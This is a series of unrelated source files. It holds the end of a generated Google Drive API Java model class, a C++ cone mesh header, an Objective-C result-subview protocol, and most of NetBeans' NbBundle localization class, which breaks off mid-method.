secondary mime types. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getSecondaryMimeTypes() { return secondaryMimeTypes; } /** * The list of secondary mime types. * @param secondaryMimeTypes secondaryMimeTypes or {@code null} for none */ public App setSecondaryMimeTypes(java.util.List<java.lang.String> secondaryMimeTypes) { this.secondaryMimeTypes = secondaryMimeTypes; return this; } /** * A short description of the app. * @return value or {@code null} for none */ public java.lang.String getShortDescription() { return shortDescription; } /** * A short description of the app. 
* @param shortDescription shortDescription or {@code null} for none */ public App setShortDescription(java.lang.String shortDescription) { this.shortDescription = shortDescription; return this; } /** * Whether this app supports creating new objects. * @return value or {@code null} for none */ public java.lang.Boolean getSupportsCreate() { return supportsCreate; } /** * Whether this app supports creating new objects. * @param supportsCreate supportsCreate or {@code null} for none */ public App setSupportsCreate(java.lang.Boolean supportsCreate) { this.supportsCreate = supportsCreate; return this; } /** * Whether this app supports importing from Docs Editors. * @return value or {@code null} for none */ public java.lang.Boolean getSupportsImport() { return supportsImport; } /** * Whether this app supports importing from Docs Editors. * @param supportsImport supportsImport or {@code null} for none */ public App setSupportsImport(java.lang.Boolean supportsImport) { this.supportsImport = supportsImport; return this; } /** * Whether this app supports opening more than one file. * @return value or {@code null} for none */ public java.lang.Boolean getSupportsMultiOpen() { return supportsMultiOpen; } /** * Whether this app supports opening more than one file. * @param supportsMultiOpen supportsMultiOpen or {@code null} for none */ public App setSupportsMultiOpen(java.lang.Boolean supportsMultiOpen) { this.supportsMultiOpen = supportsMultiOpen; return this; } /** * Whether this app supports creating new files when offline. * @return value or {@code null} for none */ public java.lang.Boolean getSupportsOfflineCreate() { return supportsOfflineCreate; } /** * Whether this app supports creating new files when offline. * @param supportsOfflineCreate supportsOfflineCreate or {@code null} for none */ public App setSupportsOfflineCreate(java.lang.Boolean supportsOfflineCreate) { this.supportsOfflineCreate = supportsOfflineCreate; return this; } /** * Whether the app is selected as the default handler for the types it supports. * @return value or {@code null} for none */ public java.lang.Boolean getUseByDefault() { return useByDefault; } /** * Whether the app is selected as the default handler for the types it supports. * @param useByDefault useByDefault or {@code null} for none */ public App setUseByDefault(java.lang.Boolean useByDefault) { this.useByDefault = useByDefault; return this; } @Override public App set(String fieldName, Object value) { return (App) super.set(fieldName, value); } @Override public App clone() { return (App) super.clone(); } /** * Model definition for AppIcons. */ public static final class Icons extends com.google.api.client.json.GenericJson { /** * Category of the icon. Allowed values are: - application - icon for the application - document * - icon for a file associated with the app - documentShared - icon for a shared file associated * with the app * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String category; /** * URL for the icon. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String iconUrl; /** * Size of the icon. Represented as the maximum of the width and height. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Integer size; /** * Category of the icon. 
Allowed values are: - application - icon for the application - document * - icon for a file associated with the app - documentShared - icon for a shared file associated * with the app * @return value or {@code null} for none */ public java.lang.String getCategory() { return category; } /** * Category of the icon. Allowed values are: - application - icon for the application - document * - icon for a file associated with the app - documentShared - icon for a shared file associated * with the app * @param category category or {@code null} for none */ public Icons setCategory(java.lang.String category) { this.category = category; return this; } /** * URL for the icon. * @return value or {@code null} for none */ public java.lang.String getIconUrl() { return iconUrl; } /** * URL for the icon. * @param iconUrl iconUrl or {@code null} for none */ public Icons setIconUrl(java.lang.String iconUrl) { this.iconUrl = iconUrl; return this; } /** * Size of the icon. Represented as the maximum of the width and height. * @return value or {@code null} for none */ public java.lang.Integer getSize() { return size; } /** * Size of the icon. Represented as the maximum of the width and height. * @param size size or {@code null} for none */ public Icons setSize(java.lang.Integer size) { this.size = size; return this; } @Override public Icons set(String fieldName, Object value) { return (Icons) super.set(fieldName, value); } @Override public Icons clone() { return (Icons) super.clone(); } } }
6,735
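The generated App model above is pure data binding; the sketch below shows how such a model is typically consumed once the Drive v2 client returns it. This is a minimal illustration, not part of the generated library: it assumes a fully configured Drive service (transport, JSON factory and credentials built elsewhere) and that the v2 apps collection is exposed on it as apps().list(); the class name ListDriveApps, the method printInstalledApps and the drive variable are hypothetical.

import java.io.IOException;
import com.google.api.services.drive.Drive;
import com.google.api.services.drive.model.App;
import com.google.api.services.drive.model.AppList;

public class ListDriveApps {
    // Sketch only: constructing the Drive service (transport, credentials) is assumed to happen elsewhere.
    static void printInstalledApps(Drive drive) throws IOException {
        AppList apps = drive.apps().list().execute();
        for (App app : apps.getItems()) {
            // Every field may be null, as the generated Javadoc notes, hence the defensive Boolean check.
            if (Boolean.TRUE.equals(app.getInstalled())) {
                System.out.println(app.getName() + " -> " + app.getOpenUrlTemplate());
            }
        }
    }
}

The null-checks mirror the "value may be null for none" contract stated throughout the generated Javadoc.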
791
<filename>engine/runtime/rendering/generator/cone_mesh.hpp #ifndef GENERATOR_CONEMESH_HPP #define GENERATOR_CONEMESH_HPP #include "axis_swap_mesh.hpp" #include "lathe_mesh.hpp" #include "line_shape.hpp" #include "uv_flip_mesh.hpp" namespace generator { /// A cone centered at the origin with its tip pointing towards the z-axis. /// @image html ConeMesh.svg class cone_mesh_t { private: using impl_t = axis_swap_mesh_t<lathe_mesh_t<line_shape_t>>; impl_t axis_swap_mesh_; public: ///@param radius Radius of the negative z end on the xy-plane. ///@param size Half of the length of the cone along the z-axis. ///@param slices Number of subdivisions around the z-axis. ///@param segments Number of subdivisions along the z-axis. ///@param start Counterclockwise angle around the z-axis relative to the x-axis. ///@param sweep Counterclockwise angle around the z-axis. cone_mesh_t(double radius = 1.0, double size = 1.0, int slices = 32, int segments = 8, double start = 0.0, double sweep = gml::radians(360.0)); using triangles_t = typename impl_t::triangles_t; triangles_t triangles() const noexcept { return axis_swap_mesh_.triangles(); } using vertices_t = typename impl_t::vertices_t; vertices_t vertices() const noexcept { return axis_swap_mesh_.vertices(); } }; } #endif
475
377
<reponame>MoathOthman/blinkid-ios // // MBResultSubview.h // MicroblinkDev // // Created by <NAME> on 02/05/2018. // #import "MBRecognizerResult.h" /** * Protocol for processing MBRecognizerResult. Subviews implementing this protocol process and draw result data on the screen (e.g. letting users know whether scanning was successful). */ @protocol MBResultSubview <NSObject> /** * This method should be called when the MBRecognizerResultState is obtained and the result state needs to be drawn/redrawn. */ - (void)scanningFinishedWithState:(MBRecognizerResultState)state; @end
179
988
<filename>platform/openide.util/src/org/openide/util/NbBundle.java /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.openide.util; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.lang.annotation.Target; import java.lang.ref.Reference; import java.lang.ref.WeakReference; import java.net.URL; import java.nio.ByteBuffer; import java.nio.CharBuffer; import java.nio.charset.Charset; import java.nio.charset.CharsetDecoder; import java.nio.charset.CharsetEncoder; import java.nio.charset.CoderResult; import java.nio.charset.CodingErrorAction; import java.nio.charset.StandardCharsets; import java.util.ArrayList; import java.util.Collections; import java.util.Enumeration; import java.util.HashMap; import java.util.Iterator; import java.util.LinkedList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.MissingResourceException; import java.util.NoSuchElementException; import java.util.Properties; import java.util.ResourceBundle; import java.util.WeakHashMap; import java.util.jar.Attributes; import java.util.logging.Level; import java.util.logging.Logger; /** Convenience class permitting easy loading of localized resources of various sorts. * Extends the functionality of {@link ResourceBundle} to handle branding, and interacts * better with class loaders in a module system. * <p>Example usage: * <pre> * package com.mycom; * public class Foo { * public String getDisplayName() { * return {@link #getMessage(Class,String) NbBundle.getMessage}(Foo.class, "Foo.displayName"); * } * } * </pre> * will in German locale look for the key {@code Foo.displayName} in * {@code com/mycom/Bundle_de.properties} and then {@code com/mycom/Bundle.properties} (in that order). * Usually however it is easiest to use {@link org.openide.util.NbBundle.Messages}. */ public class NbBundle extends Object { private static final Logger LOG = Logger.getLogger(NbBundle.class.getName()); private static final boolean USE_DEBUG_LOADER = Boolean.getBoolean("org.openide.util.NbBundle.DEBUG"); // NOI18N private static String brandingToken = null; private static final UtfThenIsoCharset utfThenIsoCharset = new UtfThenIsoCharset(false); private static final UtfThenIsoCharset utfThenIsoCharsetOnlyUTF8 = new UtfThenIsoCharset(true); /** * Cache of URLs for localized files. * Keeps only weak references to the class loaders. * @see "#9275" */ static final Map<ClassLoader,Map<String,URL>> localizedFileCache = new WeakHashMap<ClassLoader,Map<String,URL>>(); /** * Cache of resource bundles. 
*/ static final Map<ClassLoader,Map<String,Reference<ResourceBundle>>> bundleCache = new WeakHashMap<ClassLoader,Map<String,Reference<ResourceBundle>>>(); /** * Do not call. * @deprecated There is no reason to instantiate or subclass this class. * All methods in it are static. */ @Deprecated public NbBundle() { } /** Get the current branding token. * @return the branding, or <code>null</code> for none */ public static String getBranding() { return brandingToken; } /** Set the current branding token. * The permitted format, as a regular expression: * <pre>[a-z][a-z0-9]*(_[a-z][a-z0-9]*)*</pre> * <p class="nonnormative"> * This is normally only called by NetBeans startup code and unit tests. * Currently the branding may be specified by passing the <code>--branding</code> * command-line option to the launcher. * </p> * @param bt the new branding, or <code>null</code> to clear * @throws IllegalArgumentException if in an incorrect format */ public static void setBranding(String bt) throws IllegalArgumentException { if (bt != null && !bt.matches("[a-z][a-z0-9]*(_[a-z][a-z0-9]*)*")) { // NOI18N throw new IllegalArgumentException("Malformed branding token: " + bt); // NOI18N } brandingToken = bt; } /** * Get a localized and/or branded file in the default locale with the default class loader. * <p>Note that use of this call is similar to using the URL protocol <code>nbresloc</code> * (which may in fact be implemented using the fuller form of the method). * <p>The extension may be null, in which case no final dot will be appended. * If it is the empty string, the resource will end in a dot. * @param baseName base name of file, as dot-separated path (e.g. <code>some.dir.File</code>) * @param ext extension of file (or <code>null</code>) * @return URL of matching localized file * @throws MissingResourceException if not found * @deprecated Use the <code>nbresloc</code> URL protocol instead. This method does a poor * job of handling resources such as <samp>/some.dir/res.txt</samp> or * <samp>/some/res.txt.sample</samp>. */ @Deprecated public static synchronized URL getLocalizedFile(String baseName, String ext) throws MissingResourceException { return getLocalizedFile(baseName, ext, Locale.getDefault(), getLoader()); } /** * Get a localized and/or branded file with the default class loader. * @param baseName base name of file, as dot-separated path (e.g. <code>some.dir.File</code>) * @param ext extension of file (or <code>null</code>) * @param locale locale of file * @return URL of matching localized file * @throws MissingResourceException if not found * @deprecated Use the <code>nbresloc</code> URL protocol instead. This method does a poor * job of handling resources such as <samp>/some.dir/res.txt</samp> or * <samp>/some/res.txt.sample</samp>. */ @Deprecated public static synchronized URL getLocalizedFile(String baseName, String ext, Locale locale) throws MissingResourceException { return getLocalizedFile(baseName, ext, locale, getLoader()); } /** * Get a localized and/or branded file. * @param baseName base name of file, as dot-separated path (e.g. <code>some.dir.File</code>) * @param ext extension of file (or <code>null</code>) * @param locale locale of file * @param loader class loader to use * @return URL of matching localized file * @throws MissingResourceException if not found * @deprecated Use the <code>nbresloc</code> URL protocol instead. This method does a poor * job of handling resources such as <samp>/some.dir/res.txt</samp> or * <samp>/some/res.txt.sample</samp>. 
*/ @Deprecated public static synchronized URL getLocalizedFile(String baseName, String ext, Locale locale, ClassLoader loader) throws MissingResourceException { // [PENDING] in the future, could maybe do something neat if // USE_DEBUG_LOADER and ext is "html" or "txt" etc... URL lookup = null; Iterator<String> it = new LocaleIterator(locale); List<String> cacheCandidates = new ArrayList<String>(10); String baseNameSlashes = baseName.replace('.', '/'); Map<String,URL> perLoaderCache = localizedFileCache.get(loader); if (perLoaderCache == null) { localizedFileCache.put(loader, perLoaderCache = new HashMap<String,URL>()); } // #31008: better use of domain cache priming. // [PENDING] remove this hack in case the domain cache is precomputed URL baseVariant; String path; if (ext != null) { path = baseNameSlashes + '.' + ext; } else { path = baseNameSlashes; } lookup = perLoaderCache.get(path); if (lookup == null) { baseVariant = loader.getResource(path); } else { // who cares? already in cache anyway baseVariant = null; } while (it.hasNext()) { String suffix = it.next(); if (ext != null) { path = baseNameSlashes + suffix + '.' + ext; } else { path = baseNameSlashes + suffix; } lookup = perLoaderCache.get(path); if (lookup != null) { break; } cacheCandidates.add(path); if (suffix.length() == 0) { lookup = baseVariant; } else { lookup = loader.getResource(path); } if (lookup != null) { break; } } if (lookup == null) { path = baseName.replace('.', '/'); if (ext != null) { path += ('.' + ext); } throw new MissingResourceException( "Cannot find localized resource " + path + " in " + loader, loader.toString(), path ); // NOI18N } else { // Note that this is not 100% accurate. If someone calls gLF on something // with a locale/branding combo such as _brand_ja, and the answer is found // as _ja, then a subsequent call with param _brand will find this _ja // version - since the localizing iterator does *not* have the property that // each subsequent item is more general than the previous. However, this // situation is very unlikely, so consider this close enough. it = cacheCandidates.iterator(); while (it.hasNext()) { perLoaderCache.put(it.next(), lookup); } return lookup; } } /** * Find a localized and/or branded value for a given key and locale. * Scans through a map to find * the most localized match possible. For example: * <p><code><PRE> * findLocalizedValue (hashTable, "keyName", new Locale ("cs_CZ")) * </PRE></code> * <p>This would return the first non-<code>null</code> value obtained from the following tests: * <UL> * <LI> <CODE>hashTable.get ("keyName_cs_CZ")</CODE> * <LI> <CODE>hashTable.get ("keyName_cs")</CODE> * <LI> <CODE>hashTable.get ("keyName")</CODE> * </UL> * * @param table mapping from localized strings to objects * @param key the key to look for * @param locale the locale to use * @return the localized object or <code>null</code> if no key matches */ public static <T> T getLocalizedValue(Map<String,T> table, String key, Locale locale) { for (String suffix : NbCollections.iterable(new LocaleIterator(locale))) { String physicalKey = key + suffix; T v = table.get(physicalKey); if (v != null) { // ok if (USE_DEBUG_LOADER && (v instanceof String)) { // Not read from a bundle, but still localized somehow: @SuppressWarnings("unchecked") T _v = (T) (((String) v) + " (?:" + physicalKey + ")"); // NOI18N; return _v; } else { return v; } } } return null; } /** * Find a localized and/or branded value for a given key in the default system locale. 
* * @param table mapping from localized strings to objects * @param key the key to look for * @return the localized object or <code>null</code> if no key matches * @see #getLocalizedValue(Map,String,Locale) */ public static <T> T getLocalizedValue(Map<String,T> table, String key) { return getLocalizedValue(table, key, Locale.getDefault()); } /** * Find a localized and/or branded value in a JAR manifest. * @param attr the manifest attributes * @param key the key to look for (case-insensitive) * @param locale the locale to use * @return the value if found, else <code>null</code> */ public static String getLocalizedValue(Attributes attr, Attributes.Name key, Locale locale) { return getLocalizedValue(attr2Map(attr), key.toString().toLowerCase(Locale.US), locale); } /** * Find a localized and/or branded value in a JAR manifest in the default system locale. * @param attr the manifest attributes * @param key the key to look for (case-insensitive) * @return the value if found, else <code>null</code> */ public static String getLocalizedValue(Attributes attr, Attributes.Name key) { // Yes, US locale is intentional! The attribute name may only be ASCII anyway. // It is necessary to lowercase it *as ASCII* as in Turkish 'I' does not go to 'i'! return getLocalizedValue(attr2Map(attr), key.toString().toLowerCase(Locale.US)); } /** Necessary because Attributes implements Map; however this is dangerous! * The keys are Attributes.Name's, not Strings. * Also manifest lookups should not be case-sensitive. * (Though the locale suffix still will be!) */ private static Map<String,String> attr2Map(Attributes attr) { return new AttributesMap(attr); } // ---- LOADING RESOURCE BUNDLES ---- /** * Get a resource bundle with the default class loader and locale/branding. * <strong>Caution:</strong> {@link #getBundle(Class)} is generally * safer when used from a module as this method relies on the module's * classloader to currently be part of the system classloader. NetBeans * does add enabled modules to this classloader, however calls to * this variant of the method made in <a href="@org-openide-modules@/org/openide/modules/ModuleInstall.html#validate()">ModuleInstall.validate</a>, * or made soon after a module is uninstalled (due to background threads) * could fail unexpectedly. * @param baseName bundle basename * @return the resource bundle * @exception MissingResourceException if the bundle does not exist */ public static ResourceBundle getBundle(String baseName) throws MissingResourceException { return getBundle(baseName, Locale.getDefault(), getLoader()); } /** Get a resource bundle in the same package as the provided class, * with the default locale/branding and the class' own classloader. * The usual style of invocation is {@link #getMessage(Class,String)} * or one of the other overloads taking message formats. 
* * @param clazz the class to take the package name from * @return the resource bundle * @exception MissingResourceException if the bundle does not exist */ public static ResourceBundle getBundle(Class<?> clazz) throws MissingResourceException { String name = findName(clazz); return getBundle(name, Locale.getDefault(), clazz.getClassLoader()); } /** Finds package name for given class */ private static String findName(Class<?> clazz) { String pref = clazz.getName(); int last = pref.lastIndexOf('.'); if (last >= 0) { pref = pref.substring(0, last + 1); return pref + "Bundle"; // NOI18N } else { // base package, search for bundle return "Bundle"; // NOI18N } } /** * Get a resource bundle with the default class loader and branding. * @param baseName bundle basename * @param locale the locale to use (but still uses {@link #getBranding default branding}) * @return the resource bundle * @exception MissingResourceException if the bundle does not exist */ public static ResourceBundle getBundle(String baseName, Locale locale) throws MissingResourceException { return getBundle(baseName, locale, getLoader()); } /** Get a resource bundle the hard way. * @param baseName bundle basename * @param locale the locale to use (but still uses {@link #getBranding default branding}) * @param loader the class loader to use * @return the resource bundle * @exception MissingResourceException if the bundle does not exist */ public static ResourceBundle getBundle(String baseName, Locale locale, ClassLoader loader) throws MissingResourceException { if (USE_DEBUG_LOADER) { loader = DebugLoader.get(loader); } // Could more simply use ResourceBundle.getBundle (plus some special logic // with MergedBundle to handle branding) instead of manually finding bundles. // However this code is faster and has some other desirable properties. // Cf. #13847. ResourceBundle b = getBundleFast(baseName, locale, loader); if (b != null) { return b; } else { MissingResourceException e = new MissingResourceException("No such bundle " + baseName, baseName, null); // NOI18N if (Lookup.getDefault().lookup(ClassLoader.class) == null) { Exceptions.attachMessage(e, "Class loader not yet initialized in lookup"); // NOI18N } else { Exceptions.attachMessage(e, "Offending classloader: " + loader); // NOI18N } throw e; } } /** * Get a resource bundle by name. * Like {@link ResourceBundle#getBundle(String,Locale,ClassLoader)} but faster, * and also understands branding. * First looks for <samp>.properties</samp>-based bundles, then <samp>.class</samp>-based. * @param name the base name of the bundle, e.g. <samp>org.netbeans.modules.foo.Bundle</samp> * @param locale the locale to use * @param loader a class loader to search in * @return a resource bundle (locale- and branding-merged), or null if not found */ private static ResourceBundle getBundleFast(String name, Locale locale, ClassLoader loader) { Map<String,Reference<ResourceBundle>> m; synchronized (bundleCache) { m = bundleCache.get(loader); if (m == null) { bundleCache.put(loader, m = new HashMap<String,Reference<ResourceBundle>>()); } } //A minor optimization to cut down on StringBuffer allocations - OptimizeIt //showed the commented out code below was a major source of them. This //just does the same thing with a char array - Tim String localeStr = locale.toString(); char[] k = new char[name.length() + ((brandingToken != null) ? 
brandingToken.length() : 1) + 2 + localeStr.length()]; name.getChars(0, name.length(), k, 0); k[name.length()] = '/'; //NOI18N int pos = name.length() + 1; if (brandingToken == null) { k[pos] = '-'; //NOI18N pos++; } else { brandingToken.getChars(0, brandingToken.length(), k, pos); pos += brandingToken.length(); } k[pos] = '/'; //NOI18N pos++; localeStr.getChars(0, localeStr.length(), k, pos); String key = new String(k); /* String key = name + '/' + (brandingToken != null ? brandingToken : "-") + '/' + locale; // NOI18N */ synchronized (m) { Reference<ResourceBundle> o = m.get(key); ResourceBundle b = o != null ? o.get() : null; if (b != null) { return b; } else { b = loadBundle(name, locale, loader); if (b != null) { m.put(key, new TimedSoftReference<ResourceBundle>(b, m, key)); } else { // Used to cache misses as well, to make the negative test faster. // However this caused problems: see #31578. } return b; } } } /** * Load a resource bundle (without caching). * @param name the base name of the bundle, e.g. <samp>org.netbeans.modules.foo.Bundle</samp> * @param locale the locale to use * @param loader a class loader to search in * @return a resource bundle (locale- and branding-merged), or null if not found */ private static ResourceBundle loadBundle(String name, Locale locale, ClassLoader loader) { String sname = name.replace('.', '/'); Iterator<String> it = new LocaleIterator(locale); LinkedList<String> l = new LinkedList<String>(); while (it.hasNext()) { l.addFirst(it.next()); } Properties p = new Properties(); for (String suffix : l) { String res = sname + suffix + ".properties"; // #49961: don't use getResourceAsStream; catch all errors opening it URL u = loader != null ? loader.getResource(res) : ClassLoader.getSystemResource(res); if (u != null) { //System.err.println("Loading " + res); try { // #51667: but in case we are in USE_DEBUG_LOADER mode, use gRAS (since getResource is not overridden) InputStream is = USE_DEBUG_LOADER ? (loader != null ? loader.getResourceAsStream(res) : ClassLoader.getSystemResourceAsStream(res)) : u.openStream(); // #NETBEANS-5181 String encoding = System.getProperty("java.util.PropertyResourceBundle.encoding"); UtfThenIsoCharset charset = "UTF-8".equals(encoding) ? utfThenIsoCharsetOnlyUTF8 : utfThenIsoCharset; InputStreamReader reader = new InputStreamReader(is, "ISO-8859-1".equals(encoding) ? StandardCharsets.ISO_8859_1.newDecoder() : charset.newDecoder()); try { p.load(reader); } finally { is.close(); } } catch (IOException e) { Exceptions.attachMessage(e, "While loading: " + res); // NOI18N LOG.log(Level.WARNING, null, e); return null; } } else if (suffix.length() == 0) { // No base *.properties. Try *.class. // Note that you may not mix *.properties w/ *.class this way. return loadBundleClass(name, sname, locale, l, loader); } } return new PBundle(NbCollections.checkedMapByFilter(p, String.class, String.class, true), locale); } /** * Load a class-based resource bundle. * @param name the base name of the bundle, e.g. <samp>org.netbeans.modules.foo.Bundle</samp> * @param sname the name with slashes, e.g. 
<samp>org/netbeans/modules/foo/Bundle</samp> * @param locale the locale to use * @param suffixes a list of suffixes to apply to the bundle name, in <em>increasing</em> order of specificity * @param loader a class loader to search in * @return a resource bundle (merged according to the suffixes), or null if not found */ private static ResourceBundle loadBundleClass( String name, String sname, Locale locale, List<String> suffixes, ClassLoader l ) { if (l != null && l.getResource(sname + ".class") == null) { // NOI18N // No chance - no base bundle. Don't waste time catching CNFE. return null; } ResourceBundle master = null; for (String suffix : suffixes) { try { Class<? extends ResourceBundle> c = Class.forName(name + suffix, true, l).asSubclass(ResourceBundle.class); ResourceBundle b = c.newInstance(); if (master == null) { master = b; } else { master = new MergedBundle(locale, b, master); } } catch (ClassNotFoundException cnfe) { // fine - ignore } catch (Exception e) { LOG.log(Level.WARNING, null, e); } catch (LinkageError e) { LOG.log(Level.WARNING, null, e); } } return master; } // // Helper methods to simplify localization of messages // /** * Finds a localized and/or branded string in a bundle. * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found */ public static String getMessage(Class<?> clazz, String resName) throws MissingResourceException { return getBundle(clazz).getString(resName); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param param1 the argument to use when formatting the message * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) */ public static String getMessage(Class<?> clazz, String resName, Object param1) throws MissingResourceException { return getMessage(clazz, resName, new Object[] { param1 }); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param param1 the argument to use when formatting the message * @param param2 the second argument to use for formatting * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) */ public static String getMessage(Class<?> clazz, String resName, Object param1, Object param2) throws MissingResourceException { return getMessage(clazz, resName, new Object[] { param1, param2 }); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. 
* * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param param1 the argument to use when formatting the message * @param param2 the second argument to use for formatting * @param param3 the third argument to use for formatting * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) */ public static String getMessage(Class<?> clazz, String resName, Object param1, Object param2, Object param3) throws MissingResourceException { return getMessage(clazz, resName, new Object[] { param1, param2, param3 }); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param param1 the argument to use when formatting the message * @param param2 the second argument to use for formatting * @param param3 the third argument to use for formatting * @param param4 the fourth argument to use for formatting * @param params fifth, sixth, ... arguments as needed * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) * @since org.openide.util 7.27 */ public static String getMessage(Class<?> clazz, String resName, Object param1, Object param2, Object param3, Object param4, Object... params) throws MissingResourceException { Object[] allParams = new Object[params.length + 4]; allParams[0] = param1; allParams[1] = param2; allParams[2] = param3; allParams[3] = param4; System.arraycopy(params, 0, allParams, 4, params.length); return getMessage(clazz, resName, allParams); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param arr array of parameters to use for formatting the message * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) */ public static String getMessage(Class<?> clazz, String resName, Object[] arr) throws MissingResourceException { return java.text.MessageFormat.format(getMessage(clazz, resName), arr); } /** @return default class loader which is used, when we don't have * any other class loader. (in function getBundle(String), getLocalizedFile(String), * and so on... */ private static ClassLoader getLoader() { ClassLoader c = Lookup.getDefault().lookup(ClassLoader.class); return (c != null) ? c : ClassLoader.getSystemClassLoader(); } /** * Get a list of all suffixes used to search for localized/branded resources. * Based on the default locale and branding, returns the list of suffixes * which various <code>NbBundle</code> methods use as the search order. 
* For example, when {@link #getBranding} returns <code>branding</code> * and the default locale is German, you might get a sequence such as: * <ol> * <li><samp>"_branding_de"</samp> * <li><samp>"_branding"</samp> * <li><samp>"_de"</samp> * <li><samp>""</samp> * </ol> * @return a read-only iterator of type <code>String</code> * @since 1.1.5 */ public static Iterator<String> getLocalizingSuffixes() { return new LocaleIterator(Locale.getDefault()); } /** * Do not use. * @param loaderFinder ignored * @deprecated Useless. */ @Deprecated public static void setClassLoaderFinder(ClassLoaderFinder loaderFinder) { throw new Error(); } /** * Creates a helper class with static definitions of bundle keys. * <p> * The generated class will be called {@code Bundle} and be in the same package. * Each key is placed in a {@code Bundle.properties} file also in the same package, * and the helper class gets a method with the same name as the key * (converted to a valid Java identifier as needed) * which loads the key from the (possibly now localized) bundle using {@link NbBundle#getMessage(Class, String)}. * The method will have as many arguments (of type {@code Object}) as there are message format parameters. * </p> * <p>It is an error to duplicate a key within a package, even if the duplicates are from different compilation units.</p> * <p>Example usage:</p> * <pre> * package some.where; * import org.openide.util.NbBundle.Messages; * import static some.where.Bundle.*; * import org.openide.DialogDisplayer; * import org.openide.NotifyDescriptor; * class Something { * &#64;Messages({ * "dialog.title=Bad File", * "# {0} - file path", * "dialog.message=The file {0} was invalid." * }) * void showError(File f) { * NotifyDescriptor d = new NotifyDescriptor.Message( * dialog_message(f), NotifyDescriptor.ERROR_MESSAGE); * d.setTitle(dialog_title()); * DialogDisplayer.getDefault().notify(d); * } * } * </pre> * <p>which generates during compilation {@code Bundle.java}:</p> * <pre> * class Bundle { * static String dialog_title() {...} * static String dialog_message(Object file_path) {...} * } * </pre> * <p>and {@code Bundle.properties}:</p> * <pre> * dialog.title=Bad File * # {0} - file path * dialog.message=The file {0} was invalid. * </pre> * @since org.openide.util 8.10 (available also on fields since 8.22) */ @Retention(RetentionPolicy.SOURCE) @Target({ElementType.PACKAGE, ElementType.TYPE, ElementType.METHOD, ElementType.CONSTRUCTOR, ElementType.FIELD}) public @interface Messages { /** * List of key/value pairs. * Each must be of the form {@code key=Some Value}. * Anything is permitted in the value, including newlines. * Unlike in a properties file, there should be no whitespace before the key or around the equals sign. * Values containing <code>{0}</code> etc. are assumed to be message formats and so may need escapes for metacharacters such as {@code '}. * A line may also be a comment if it starts with {@code #}, which may be useful for translators; * it is recommended to use the format {@code # {0} - summary of param}. */ String[] value(); } /** * Do not use. * @deprecated Useless. */ @Deprecated public static interface ClassLoaderFinder { /** * Do not use. * @return nothing * @deprecated Useless. 
*/ @Deprecated public ClassLoader find(); } private static class AttributesMap extends HashMap<String,String> { private Attributes attrs; public AttributesMap(Attributes attrs) { super(7); this.attrs = attrs; } public @Override String get(Object _k) { if (!(_k instanceof String)) { return null; } String k = (String) _k; Attributes.Name an; try { an = new Attributes.Name(k); } catch (IllegalArgumentException iae) { // Robustness, and workaround for reported MRJ locale bug: LOG.log(Level.FINE, null, iae); return null; } return attrs.getValue(an); } } /** * A resource bundle based on <samp>.properties</samp> files (or any map). */ private static final class PBundle extends ResourceBundle { private final Map<String,String> m; private final Locale locale; /** * Create a new bundle based on a map. * @param m a map from resources keys to values (typically both strings) * @param locale the locale it represents <em>(informational)</em> */ public PBundle(Map<String,String> m, Locale locale) { this.m = m; this.locale = locale; } public @Override Enumeration<String> getKeys() { return Collections.enumeration(m.keySet()); } protected @Override Object handleGetObject(String key) { return m.get(key); } public @Override Locale getLocale() { return locale; } } /** Special resource bundle which delegates to two others. * Ideally could just set the parent on the first, but this is protected, so... */ private static class MergedBundle extends ResourceBundle { private Locale loc; private ResourceBundle sub1; private ResourceBundle sub2; /** * Create a new bundle delegating to two others. * @param loc the locale it represents <em>(informational)</em> * @param sub1 one delegate (taking precedence over the other in case of overlap) * @param sub2 the other (weaker) delegate */ public MergedBundle(Locale loc, ResourceBundle sub1, ResourceBundle sub2) { this.loc = loc; this.sub1 = sub1; this.sub2 = sub2; } public @Override Locale getLocale() { return loc; } public @Override Enumeration<String> getKeys() { return Enumerations.removeDuplicates(Enumerations.concat(sub1.getKeys(), sub2.getKeys())); } protected @Override Object handleGetObject(String key) throws MissingResourceException { try { return sub1.getObject(key); } catch 